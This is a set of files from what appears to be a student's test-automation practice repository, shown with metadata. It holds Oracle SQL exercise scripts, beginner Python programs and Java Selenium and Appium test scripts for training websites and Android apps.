values(5005,'BB','London',14) \ninto salesman values(5006,'CC','US',16) \ninto salesman values(5007,'DD','UK',17) \n \nselect * from DUAL;\n\nINSERT ALL \ninto salesman values(5002,'NailKnite','Paris',13) \ninto salesman values(5005,'BB','London',14) \ninto salesman values(5006,'CC','US',16) \ninto salesman values(5007,'DD','UK',17) \n \nselect * from DUAL;\n\nselect salesman_id,salesman_city from salesman;\n\nselect salesman_id,salesman_city from salesman;\n\nselect salesman_id,salesman_city from salesman;\n\nselect * from salesman where salesman_city='Paris';\n\nselect * from salesman where salesman_city='Paris';\n\nselect * from salesman where salesman_city='Paris';\n\nselect salesman_id,commission from salesman where \nsalesman_name='NailKnite';\n\nalter table salesman add grade int;\n\nupdate salesman set grade =100;\n\nupdate salesman set grade =100;\n\nselect * from salesman;\n\nselect * from salesman;\n\nupdate salesman set grade=200 \nwhere salesman_city='Paris';\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nselect* from salesman;\n\nupdate salesman set Grade=300 \nwhere salesman_name='BB';\n\nupdate salesman set Grade=300 \nwhere salesman_name='BB';\n\nupdate 
salesman set Grade=300 \nwhere salesman_name='BB';\n\nselect * from salesman;\n\nselect * from salesman \n \nupdate salesman set \nsalesman_name='KK' \nwhere salesman_name='CC';\n\nselect * from salesman \n \nupdate salesman set \nsalesman_name='KK' \nwhere salesman_name='CC';\n\nselect * from salesman \n \nupdate salesman set \nsalesman_name='KK' \nwhere salesman_name='CC';\n\nupdate salesman set \nsalesman_name='KK' \nwhere salesman_name='CC';\n\n" }, { "alpha_fraction": 0.6068965792655945, "alphanum_fraction": 0.6758620738983154, "avg_line_length": 33.25, "blob_id": "b4e09f55cb9624acbd68bad293cf8da28900fd6b", "content_id": "612c52ac6c5c09270fd03d260d65711a3936a12a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 52, "num_lines": 4, "path": "/name_age1.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "name=input(\"Enter your name\")\r\nage=input(\"Enter your age\" )\r\nyear=(2020-int(age))+100\r\nprint(name+\"Will be100 years old in year\"+str(year))\r\n\r\n\r\n" }, { "alpha_fraction": 0.6661316156387329, "alphanum_fraction": 0.6709470152854919, "avg_line_length": 18.09677505493164, "blob_id": "f36d69bffa765ac30710e97f74478327a97160a6", "content_id": "fd4ffc2c6a929105e35a7fe9315036f4be1790fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 623, "license_type": "no_license", "max_line_length": 61, "num_lines": 31, "path": "/Car.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package JavaActivity1;\r\n\r\npublic class Car {\r\n\tString color;\r\n\tint make;\r\n\tString transmission;\r\n\tint tyers;\r\n\tint doors;\r\n\r\n\r\n\r\nCar(){\r\n\ttyers=4;\r\n\tdoors=4;\r\n\t\t\t\r\n}\r\npublic void displayCharacteristics() {\r\n\tSystem.out.println(\"Color of the Car:\"+color);\r\n\tSystem.out.println(\"make of the car:\"+make);\r\n\tSystem.out.println(\"Transmission of the car:\"+transmission);\r\n\tSystem.out.println(\"Number of doors on the Car:\"+doors);\r\n\tSystem.out.println(\"Number if tyres on the car:\"+tyers);\r\n\t\r\n}\r\npublic void accelerate() {\r\n\tSystem.out.println(\"Accelerating.\");\r\n}\r\npublic void brake() {\r\n\tSystem.out.println(\"Breaking\");\r\n}\r\n}\r\n" }, { "alpha_fraction": 0.6226851940155029, "alphanum_fraction": 0.6319444179534912, "avg_line_length": 16.869565963745117, "blob_id": "02c20722d90219712408e74e6a09dc7d78f3641a", "content_id": "6b86940a0281f678f735d9c0d9747e643d596a7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 432, "license_type": "no_license", "max_line_length": 40, "num_lines": 23, "path": "/Act_3.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_3_A;\r\n\r\nimport java.util.LinkedList;\r\nimport java.util.Queue;\r\n\r\npublic class Act_3 {\r\n\tpublic static void main( String args[])\r\n\t{\r\n\tQueue<Integer> q =new LinkedList<>();\r\n\t\r\n\tfor (int i =1; i<=5;i++)\r\n\t{\r\n\t\tq.add(i);\r\n\t}\r\n\tSystem.out.println(q);\r\n\tint remove_number=q.remove();\r\n\tSystem.out.println(remove_number);\r\n\tSystem.out.println(q.peek());\r\n\tSystem.out.println(q.size());\r\n\tSystem.out.println(q);\r\n\t\r\n\t}\r\n}" }, { "alpha_fraction": 0.5043478012084961, "alphanum_fraction": 0.5192546844482422, "avg_line_length": 27.66666603088379, "blob_id": "638fc087717dbed1ba0cd9cec713e3dbc2f61b7a", "content_id": 
"4a0243090b2a049568006b4d4eb9bc6a3d71af81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 805, "license_type": "no_license", "max_line_length": 43, "num_lines": 27, "path": "/Rock_paper_loops.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "user1_answer=input(\"What is user1's reply\")\r\nuser2_answer=input(\"What is user2's reply\")\r\nwhile True:\r\n if user1_answer==user2_answer:\r\n print(\"its a tie\")\r\n elif user1_answer==\"rock\" :\r\n if user2_answer=='scissors':\r\n print(\"Rock wins\")\r\n else:\r\n print(\"Paper wins\")\r\n elif user1_answer=='scissors':\r\n if user2_answer=='paper':\r\n print(\"scissors win\")\r\n else:\r\n print(\"Rock wins!!!\")\r\n elif user1_answer=='paper':\r\n if user2_answer=='rock':\r\n print(\"paper wins\")\r\n else :\r\n print(\"scissors wins\")\r\n else :\r\n print(\"Invalid inpt\")\r\n repeat=input(\"Do you want to repeat\")\r\n if repeat==\"yes\":\r\n pass\r\n elif repeat==\"no\":\r\n raise SystemExit\r\n\r\n\r\n" }, { "alpha_fraction": 0.6479057669639587, "alphanum_fraction": 0.6609947681427002, "avg_line_length": 19.885713577270508, "blob_id": "b21363304ef605df8f225676eca1556c226644e4", "content_id": "668b9dccd8a3455fe8df3cbdf5959a25c5c208c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 764, "license_type": "no_license", "max_line_length": 62, "num_lines": 35, "path": "/CustomException.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_2_4;\r\n\r\nclass CustomException extends Exception {\r\n\tprivate String message=null ;\r\n\t\r\n\tpublic CustomException(String message) {\r\n\t\tthis.message=message;\r\n\t}\r\n @Override\r\n public String getMessage() {\r\n \treturn message;\r\n \r\n \t\t\t\t\t\t\t}\r\n}\r\n\r\n class Activity_2_4{\r\n\tpublic static void main(String[] a) {\r\n\ttry {\r\n\t\tActivity_2_4.exceptionTest(\"Will print to console\");\r\n\t\tActivity_2_4.exceptionTest(null);\r\n\t\tActivity_2_4.exceptionTest(\"ABC\");\r\n\t\t\r\n\t}catch(CustomException mae) {\r\n\t\tSystem.out.println(\"Inside catch bloack:\"+mae.getMessage());\r\n\t}\r\n} \r\nstatic void exceptionTest(String str)throws CustomException{\r\n\tif (str==null) {\r\n\t\tthrow new CustomException(\"String value is null\");\r\n\t}\r\n\telse \r\n\t{System.out.println(str);\r\n\t}\r\n}\r\n}" }, { "alpha_fraction": 0.566724419593811, "alphanum_fraction": 0.5875216722488403, "avg_line_length": 25.285715103149414, "blob_id": "0b603f91af2d5052452456693980743e308e9297", "content_id": "a9a9b1f7d02370d0ee0e2bf4b2213b8566817b9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "no_license", "max_line_length": 43, "num_lines": 21, "path": "/Rockpaper.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "user1_answer=input(\"What is user1's reply\")\r\nuser2_answer=input(\"What is user2's reply\")\r\nif user1_answer==user2_answer:\r\n print(\"its a tie\")\r\nelif user1_answer==\"rock\" :\r\n if user2_answer=='scissors':\r\n print(\"Rock wins\")\r\n else:\r\n print(\"Paper wins\")\r\nelif user1_answer=='scissors':\r\n if user2_answer=='paper':\r\n print(\"scissors win\")\r\n else:\r\n print(\"Rock wins!!!\")\r\nelif user1_answer=='paper':\r\n if user2_answer=='rock':\r\n print(\"paper wins\")\r\n else :\r\n print(\"scissors wins\")\r\nelse :\r\n print(\"Invalid inpt\")\r\n\r\n\r\n" }, { "alpha_fraction": 
0.4883720874786377, "alphanum_fraction": 0.5581395626068115, "avg_line_length": 20.5, "blob_id": "582f02675aaf20634540935ab8ed244f31ff94cf", "content_id": "2d149cf70edba830f8ebe68faf977def6368dcce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 43, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/pattern.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "for i in range (1,10):\r\n print(str(i)*i)" }, { "alpha_fraction": 0.30434781312942505, "alphanum_fraction": 0.47826087474823, "avg_line_length": 15.75, "blob_id": "277d91f9f5bbacb050c5e0b3ee7f40052aeb3b39", "content_id": "73158fb92294a1c9516d3168433bbb827a242bb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 19, "num_lines": 4, "path": "/tuplenumberchecker.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "tup1=(1,5,10,20,44)\r\nfor i in tup1:\r\n if i%5==0:\r\n print(i)" }, { "alpha_fraction": 0.6636427044868469, "alphanum_fraction": 0.6810886263847351, "avg_line_length": 43.90322494506836, "blob_id": "d181c823ed8fe1e375ea6e7a68ab8f60a9fcd312", "content_id": "bfac629888fa3e0d3476564c67077b6b8e5b63e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2866, "license_type": "no_license", "max_line_length": 176, "num_lines": 62, "path": "/Project1.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "import java.io.IOException;\r\nimport java.net.MalformedURLException;\r\nimport java.net.URL;\r\nimport java.util.concurrent.TimeUnit;\r\n\r\nimport org.openqa.selenium.remote.DesiredCapabilities;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterTest;\r\nimport org.testng.annotations.BeforeTest;\r\nimport org.testng.annotations.Test;\r\n\r\nimport io.appium.java_client.AppiumDriver;\r\nimport io.appium.java_client.MobileElement;\r\nimport io.appium.java_client.android.*;\r\npublic class Project1 {\r\n\t@Test\r\n\tpublic void calc() throws InterruptedException,IOException\r\n\t{ \r\n\t\tWebDriverWait wait;\r\n\t\tDesiredCapabilities cap=new DesiredCapabilities();\r\n\t\tDesiredCapabilities cap1=new DesiredCapabilities();\r\n\t\t/*cap.setCapability(\"devicename\", \"Pixel 4_surbhi\");\r\n\t\tcap.setCapability(\"platformName\", \"Android\");\r\n cap.setCapability(\"appPackage\", \"com.google.android.apps.tasks\");\r\n cap.setCapability(\"appActivity\", \"com.google.android.apps.tasks.ui.TaskListsActivity\");\r\n //cap.setCapability(\"appWaitPackage\", \"package.android\");\r\n //cap.setCapability(\"appWaitActivity\", \"com.google.android.apps.tasks.ui.taskListsActivity\");\r\n //cap.setCapability(\"appWaitDuration\", 10000);\r\n cap.setCapability(\"noReset\", true);*/\r\n AppiumDriver<MobileElement> driver=null;\r\n // driver=new AndroidDriver<MobileElement>(new URL(\"http://127.0.0.1:4723/wd/hub\"), cap);\r\n //driver.manage().timeouts().implicitlyWait(10000,TimeUnit.SECONDS);\r\n //wait = new WebDriverWait(driver, 10);\r\n /*driver.manage().timeouts().implicitlyWait(1000,TimeUnit.SECONDS);\r\n driver.findElementById(\"tasks_fab\").click();\r\n driver.findElementById(\"add_task_title\").sendKeys(\"Surbhi\");\r\n driver.findElementById(\"add_task_done\").click();*/\r\n cap1.setCapability(\"devicename\", \"Pixel 4_surbhi\");\r\n\t\tcap1.setCapability(\"platformName\", 
\"Android\");\r\n cap1.setCapability(\"appPackage\", \"com.google.android.keep\");\r\n cap1.setCapability(\"appActivity\", \"com.google.android.keep.activities.BrowseActivity\");\r\n cap.setCapability(\"noReset\", true);\r\n \r\n driver=new AndroidDriver<MobileElement>(new URL(\"http://127.0.0.1:4723/wd/hub\"), cap1);\r\n driver.manage().timeouts().implicitlyWait(1000,TimeUnit.SECONDS);\r\n driver.findElementById(\"new_note_button\").click();\r\n \r\n String st = driver.findElementById(\"index_note_title\").getText();\r\n System.out.println(st);\r\n //driver.findElementByXPath(\"//androidx.cardview.widget.CardView[@content-desc=\\\". \\\"])[1]/android.widget.LinearLayout/android.widget.LinearLayout\").sendKeys(\"Surbhi\");\r\n driver.findElementById(\"edit_note_text\").sendKeys(\"BAhl\");\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\t}\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6512488722801208, "alphanum_fraction": 0.6679000854492188, "avg_line_length": 31.78125, "blob_id": "675125991c9146e4a9817932bdff238b155f2c0b", "content_id": "755f5699929ff6acff544077ae420390acfca7af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 105, "num_lines": 32, "path": "/Activity_4_3.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_4_3;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.By.ById;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\n\r\npublic class Activity_4_3 {\r\n\t\r\n\tpublic static void main (String args[])\r\n\t{\r\n\t\tWebDriver driver=new FirefoxDriver();\r\n\t\tdriver.get(\"https://www.training-support.net/selenium/target-practice\");\r\n\t\tString title=driver.getTitle();\r\n\t\tString text1=driver.findElement(By.xpath(\"//h3[@id='third-header']\")).getText();\r\n\t\tSystem.out.println(\"text1=======\"+text1);\r\n\t\tString text2=driver.findElement(By.xpath(\"//h5\")).getCssValue(\"color\");\r\n\t\tSystem.out.println(\"text2=======\"+text2);\r\n\t\tString text3=driver.findElement(By.xpath(\"//button[contains(text(),'Violet')]\")).getAttribute(\"class\");\r\n\t\tSystem.out.println(\"text3=======\"+text3);\r\n\t\tString text4=driver.findElement(By.xpath(\"//button[@class='ui grey button']\")).getText();\r\n\t\tSystem.out.println(\"Printing********************\");\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\tSystem.out.println(\"text4=======\"+text4);\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.42553192377090454, "alphanum_fraction": 0.4498480260372162, "avg_line_length": 21.923076629638672, "blob_id": "9d4d8b2e1585ab9e89ad4c932e961a3e3f3cfd6a", "content_id": "9617cc85c5befd2b6eb60d0fca982166b75617da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 47, "num_lines": 13, "path": "/Fruit_basket.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "fruit_basket={\"apple\":24,\r\n \"Mango\":12,\r\n \"Pear\":10,\r\n \"Banana\":15}\r\nfruit=input(\"Enter the fruit you want to find\")\r\nfor i in fruit_basket:\r\n #print (i )\r\n #print (fruit)\r\n if i==fruit:\r\n print(\"Its Present\")\r\n break\r\n else :\r\n continue\r\n \r\n\r\n\r\n " }, { "alpha_fraction": 0.43617022037506104, "alphanum_fraction": 0.5531914830207825, "avg_line_length": 14, "blob_id": 
"6daa78437ed8be7c05d1d6a8a378d4a71e9e0dbd", "content_id": "128e74d84dd051dfbde3e0259b92337b082439f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 23, "num_lines": 6, "path": "/list1.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "list1=[1,2,3,4,5,6,7,8]\r\nsum=0\r\nfor i in list1:\r\n print(i)\r\n sum=sum+int(i)\r\nprint (sum)" }, { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7632575631141663, "avg_line_length": 41.91666793823242, "blob_id": "b7a2156f71f54814c6ec33710fd2a0e0e39e4134", "content_id": "4f88c0007c16d3d880081aa3698614f7f3a6bcf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1056, "license_type": "no_license", "max_line_length": 99, "num_lines": 24, "path": "/Activity_6_2.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_6_2;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.By.ById;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.openqa.selenium.support.ui.ExpectedConditions;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\npublic class Activity_6_2 {\r\n\tpublic static void main(String args[])\r\n\t{\r\n\tWebDriver driver=new FirefoxDriver();\r\n\tWebDriverWait wait =new WebDriverWait(driver,10);\r\n\tdriver.get(\"https://training-support.net/selenium/ajax\");\r\n\tdriver.findElement(By.xpath(\"//button[contains(@class,'violet')]\")).click();\r\n\twait.until(ExpectedConditions.textToBePresentInElementLocated(By.id(\"ajax-content\"),\"HELLO!\"));\r\n\tString ajaxText=driver.findElement(By.id(\"ajax-content\")).getText();\r\n\tSystem.out.println(ajaxText);\r\n\twait.until(ExpectedConditions.textToBePresentInElementLocated(By.id(\"ajax-content\"),\"I'm late!\"));\r\n\tString lateText=driver.findElement(By.id(\"ajax-content\")).getText();\r\n\tSystem.out.println(lateText);\r\n\t}\r\n\r\n}\r\n\r\n" }, { "alpha_fraction": 0.5515695214271545, "alphanum_fraction": 0.5582959651947021, "avg_line_length": 17.39130401611328, "blob_id": "2915054d89bbb9d96699ee83683a9452b4aff5e8", "content_id": "effac1eb06580b0076ff49cd7ba64bc4e4c3b083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 446, "license_type": "no_license", "max_line_length": 45, "num_lines": 23, "path": "/Activity2.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_32;\r\n\r\nimport java.util.HashSet;\r\n\r\npublic class Activity2 {\r\n\t\r\n\t\tpublic static void main(String [] args) {\r\n\t\t\tHashSet<String> hs =new HashSet<String>();\r\n\t\t\ths.add(\"S\");\r\n\t\t\ths.add(\"P\");\r\n\t\t\ths.add(\"Q\");\r\n\t\t\ths.add(\"R\");\r\n\t\t\ths.add(\"T\");\r\n\t\t\ths.add(\"M\");\r\n\t\t\tSystem.out.println(hs);\r\n\t\t\tSystem.out.println(hs.size());\r\n\t\t\ths.remove(\"S\");\r\n\t\t\tSystem.out.println(hs.contains(\"S\"));\r\n\t\t\tSystem.out.println(hs);\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n}\r\n" }, { "alpha_fraction": 0.707355260848999, "alphanum_fraction": 0.7183098793029785, "avg_line_length": 33.5, "blob_id": "5d9f86ba4e625d87ff0cfe1fe41cf3349bf9e8ac", "content_id": "20b7e7d4cb0242cb9b6aed42af10c2c1933eee0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1278, "license_type": "no_license", "max_line_length": 
97, "num_lines": 36, "path": "/Activity_2_calculator.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "import java.io.IOException;\r\nimport java.net.MalformedURLException;\r\nimport java.net.URL;\r\nimport java.util.concurrent.TimeUnit;\r\n\r\nimport org.openqa.selenium.remote.DesiredCapabilities;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterTest;\r\nimport org.testng.annotations.BeforeTest;\r\nimport org.testng.annotations.Test;\r\n\r\nimport io.appium.java_client.AppiumDriver;\r\nimport io.appium.java_client.MobileElement;\r\nimport io.appium.java_client.android.*;\r\npublic class Activity_2_calculator {\r\n\t@Test\r\n\tpublic void calc() throws InterruptedException,IOException\r\n\t{ \r\n\t\tDesiredCapabilities cap=new DesiredCapabilities();\r\n\t\tcap.setCapability(\"devicename\", \"Pixel 4_surbhi\");\r\n\t\tcap.setCapability(\"platformName\", \"Android\");\r\n cap.setCapability(\"appPackage\", \"com.android.calculator2\");\r\n cap.setCapability(\"appActivity\", \"com.android.calculator2.Calculator\");\r\n AppiumDriver<MobileElement> driver=null;\r\n try {\r\n \tdriver = new AndroidDriver<MobileElement>(new URL(\"http://127.0.0.1:4723/wd/hub\"), cap);\r\n \tSystem.out.println(\"Calculator is open\");\r\n } catch (MalformedURLException e) {\r\n System.out.println(e.getMessage());\r\n }\r\n\t}\r\n\t\r\n\t\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7099307179450989, "alphanum_fraction": 0.7260969877243042, "avg_line_length": 41.29999923706055, "blob_id": "46fc84efcdaaef3ff8897cef64a9c5e5eb99791b", "content_id": "1564f40e25771da394ea23bfbd355912e98efa4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2165, "license_type": "no_license", "max_line_length": 139, "num_lines": 50, "path": "/Project_8.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Project_8;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.openqa.selenium.interactions.Action;\r\nimport org.openqa.selenium.interactions.Actions;\r\nimport org.openqa.selenium.support.ui.Select;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterClass;\r\nimport org.testng.annotations.AfterMethod;\r\nimport org.testng.annotations.BeforeClass;\r\nimport org.testng.annotations.BeforeMethod;\r\nimport org.testng.annotations.Test;\r\n\r\npublic class Project_8 {\r\n\tWebDriver driver;\r\n\t@BeforeClass\r\n\tpublic void beforeMethod()\r\n\t{\r\n\t\tdriver=new FirefoxDriver();\r\n\t\tdriver.get(\"http://alchemy.hguy.co/crm\");\r\n\t}\r\n\t@Test\r\n\tpublic void Accounts() throws InterruptedException\r\n\t{ \r\n\t\tWebElement ele1=driver.findElement(By.id(\"user_name\"));\r\n\t\tWebElement Pass1=driver.findElement(By.id(\"username_password\"));\r\n\t\tele1.sendKeys(\"admin\");\r\n\t\tPass1.sendKeys(\"pa$$w0rd\");\r\n\t\tdriver.findElement(By.id(\"bigbutton\")).click();\r\n\t\t//Thread.sleep(10000);\r\n\t\tActions action1=new Actions(driver);\r\n\t\tWebElement accounts=driver.findElement(By.xpath(\"//a[text()='Sales']\"));\r\n\t\taction1.moveToElement(accounts).moveToElement(driver.findElement(By.xpath(\"//a[@id='moduleTab_9_Accounts']\"))).click().build().perform();\r\n\t\tThread.sleep(5000);\r\n\t\tSystem.out.println(\"Loaded\");\r\n\t\tSystem.out.println(\"Name of the members are :-\");\r\n\t\tWebElement 
e=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[1]/td[7]\"));\r\n\t\tSystem.out.println(e.getText());\r\n\t\tWebElement e1=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[3]/td[7]\"));\r\n\t\tSystem.out.println(e1.getText());\r\n\t\tWebElement e2=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[5]/td[7]\"));\r\n\t\tSystem.out.println(e2.getText());\r\n\t\tWebElement e3=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[7]/td[7]\"));\r\n\t\tSystem.out.println(e.getText());\r\n\t\tWebElement e4=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[9]/td[7]\"));\r\n\t\tSystem.out.println(e4.getText());\r\n}\t\t\r\n}\r\n" }, { "alpha_fraction": 0.4488188922405243, "alphanum_fraction": 0.4724409580230713, "avg_line_length": 15, "blob_id": "0adce82cee3f671752a9f848de35292f594a510b", "content_id": "6851347473e6dc1e7a5df9c0c657c5d9206b6ed2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 30, "num_lines": 7, "path": "/Recursiveadder.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "def Recfunc(N):\r\n if N:\r\n return( N+Recfunc(N-1))\r\n else :\r\n return 0\r\nres=Recfunc(6)\r\nprint (res)\r\n " }, { "alpha_fraction": 0.6729065775871277, "alphanum_fraction": 0.730904221534729, "avg_line_length": 26.255125045776367, "blob_id": "db5d93ea2c5ee46e337f4ff58aa5da84ab6e64f6", "content_id": "f86e6a2e8535a29d6699b3a10aa4d816f5cc669d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 11966, "license_type": "no_license", "max_line_length": 99, "num_lines": 439, "path": "/sqlscript (2).sql", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "select * from orders ;\n\ncreate table orders ( \norder_no int primary key , \npurchase_amount float , \norder_date date, \ncustomer_id int , \nSalesman_id int);\n\ninsert all \ninto orders values(70007,150.5,TO_DATE('2012/10/05','YYYY/MM/DD'),3002,5001) \ninto orders values(70005,270.5,TO_DATE('2012/08/17','YYYY/MM/DD'),3009,5003) \ninto orders values(70011,75.25,TO_DATE('2012/08/17','YYYY/MM/DD'),3009,5003) \nSELECT 1 FROM DUAL ;\n\nselect * from orders;\n\nselect * from orders \nwhere Purchase_Amount>500;\n\nselect * from orders \nwhere 1000<=Purchase_amount<=2000;\n\ninsert all \ninto orders values(70007,150.5,TO_DATE('2012/10/05','YYYY/MM/DD'),3002,5001) \ninto orders values(70005,270.5,TO_DATE('2012/08/17','YYYY/MM/DD'),3009,5003) \ninto orders values(70011,75.25,TO_DATE('2012/08/17','YYYY/MM/DD'),3009,5003) \nSELECT 1 FROM DUAL \n \nselect * from orders;\n\nselect * from orders \nwhere Purchase_Amount>500;\n\nselect * from orders \nwhere 1000<=Purchase_amount and Purchase_amount <=2000;\n\nselect * from orders \nwhere 1000<=Purchase_amount and Purchase_amount <=2000;\n\nselect * from orders;\n\nselect sum(purchase_amount) from orders;\n\nselect avg(purchase_amount) from orders;\n\nselect Max(purchase_amount) from orders;\n\nselect min(purchase_amount) from orders;\n\nselect count(distinct salesman_id) from orders;\n\nselect * from orders;\n\nDescribe orders\n\n\nselect customer_id,max(purchase_amount) from orders group by customer_id;\n\nselect salesman_id , order_date max(Purchase_amount) as Max_amount from orders \nwhere order_date =To_date('2012/08/17','YYYY/MM/DD') \ngroup by salesman_id , order_date ;\n\nselect salesman_id , 
order_date max(Purchase_amount) as \"Max_amount\" \nfrom orders \nwhere order_date =To_date('2012/08/17','YYYY/MM/DD') \ngroup by salesman_id , order_date ;\n\nselect * from orders;\n\nselect salesman_id , order_date max(Purchase_amount) as \"Max_amount\" \nfrom orders \nwhere order_date =To_date('2012/08/17','YYYY/MM/DD') \ngroup by salesman_id , order_date ;\n\nselect salesman_id , order_date, max(Purchase_amount) as \"Max_amount\" \nfrom orders \nwhere order_date =To_date('2012/08/17','YYYY/MM/DD') \ngroup by salesman_id , order_date ;\n\nselect customer_id , oreder_date,Max(purchase_amount) As \"Max_amount\" \nfrom orders \ngroup by customer_id , order_date \nHaving Max(purchase_amount) in (2030,3450,5760,6000);\n\nselect customer_id , order_date,Max(purchase_amount) As \"Max_amount\" \nfrom orders \ngroup by customer_id , order_date \nHaving Max(purchase_amount) in (2030,3450,5760,6000);\n\ncreate table customers( \ncustomer_id int primary key , \ncustomer_name varchar(32), \ncity varchar(20), \ngrade int , \nsalesman_id int);\n\ninsert into customers values \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(30054,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values ( \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(30054,'GZ','California',200,5002), \n(3003,'JG','London',300,5002));\n\ninsert into customers values \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(30054,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(3005,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values \n (3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(3005,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(3005,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values \n(3002,'NR','New York',100,5001);\n\ninsert into customers values \n--(3002,'NR','New York',100,5001);\n\n(3007,'BD','NY',200,5001);\n\ninsert into customers values \n(3007,'BD','NY',200,5001);\n\ninsert into customers values \n(3005,'GZ','California',200,5002);\n\ninsert into customers values \n \n(3003,'JG','London',300,5002);\n\nselect * from customers;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customer a inner join salesman b \non a.salesman_id=b.salesman_id;\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n) \n \nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customer a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), 